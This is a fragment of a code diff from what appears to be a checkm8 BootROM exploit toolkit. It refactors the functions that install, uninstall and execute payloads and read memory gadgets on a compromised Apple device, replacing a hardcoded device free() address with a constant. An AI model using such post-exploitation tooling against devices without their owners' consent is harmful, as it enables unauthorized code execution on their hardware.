if(IS_CHECKM8_FAIL(resp->ret)) if(IS_CHECKM8_FAIL(resp->ret))
@@ -192,7 +178,6 @@ int install_payload(struct pwned_device *dev, PAYLOAD_T p, LOCATION_T loc)
int uninstall_payload(struct pwned_device *dev, PAYLOAD_T p) int uninstall_payload(struct pwned_device *dev, PAYLOAD_T p)
{ {
checkm8_debug_indent("uninstall payload(dev = %p, p = %i)\n", dev, p); checkm8_debug_indent("uninstall payload(dev = %p, p = %i)\n", dev, p);
DEV_PTR_T addr_free = 0x10000f1b0;
unsigned long long free_args[2]; unsigned long long free_args[2];
struct dev_cmd_resp *resp; struct dev_cmd_resp *resp;
struct payload *pl = dev_retrieve_payload(dev, p); struct payload *pl = dev_retrieve_payload(dev, p);
@@ -203,7 +188,7 @@ int uninstall_payload(struct pwned_device *dev, PAYLOAD_T p)
return CHECKM8_FAIL_INVARGS; return CHECKM8_FAIL_INVARGS;
} }
free_args[0] = addr_free; free_args[0] = ADDR_DEV_FREE;
free_args[1] = pl->install_base; free_args[1] = pl->install_base;
resp = dev_exec(dev, 0, 2, free_args); resp = dev_exec(dev, 0, 2, free_args);
@@ -261,8 +246,7 @@ int uninstall_data(struct pwned_device *dev, DEV_PTR_T addr)
{ {
checkm8_debug_indent("uninstall_data(dev = %p, addr = %X)\n", dev, addr); checkm8_debug_indent("uninstall_data(dev = %p, addr = %X)\n", dev, addr);
struct dev_cmd_resp *resp; struct dev_cmd_resp *resp;
DEV_PTR_T addr_free = 0x10000f1b0; unsigned long long free_args[2] = {ADDR_DEV_FREE, addr};
unsigned long long free_args[2] = {addr_free, addr};
resp = dev_exec(dev, 0, 2, free_args); resp = dev_exec(dev, 0, 2, free_args);
if(IS_CHECKM8_FAIL(resp->ret)) if(IS_CHECKM8_FAIL(resp->ret))
@@ -319,6 +303,14 @@ unsigned long long execute_payload_async(struct pwned_device *dev, PAYLOAD_T p,
checkm8_debug_indent("\tpayload is not installed\n"); checkm8_debug_indent("\tpayload is not installed\n");
return DEV_PTR_NULL; return DEV_PTR_NULL;
} }
if(bufsize < nargs * sizeof(unsigned long long))
{
checkm8_debug_indent("\texpanding buffer to fit (at least) provided arguments\n");
bufsize = nargs * sizeof(unsigned long long);
}
} }
struct dev_cmd_resp *read_gadget(struct pwned_device *dev, DEV_PTR_T addr, int len) struct dev_cmd_resp *read_gadget(struct pwned_device *dev, DEV_PTR_T addr, int len)

BIN
pongo/demote_mod
View File

Binary file not shown.

BIN
pongo/test_module
View File

Binary file not shown.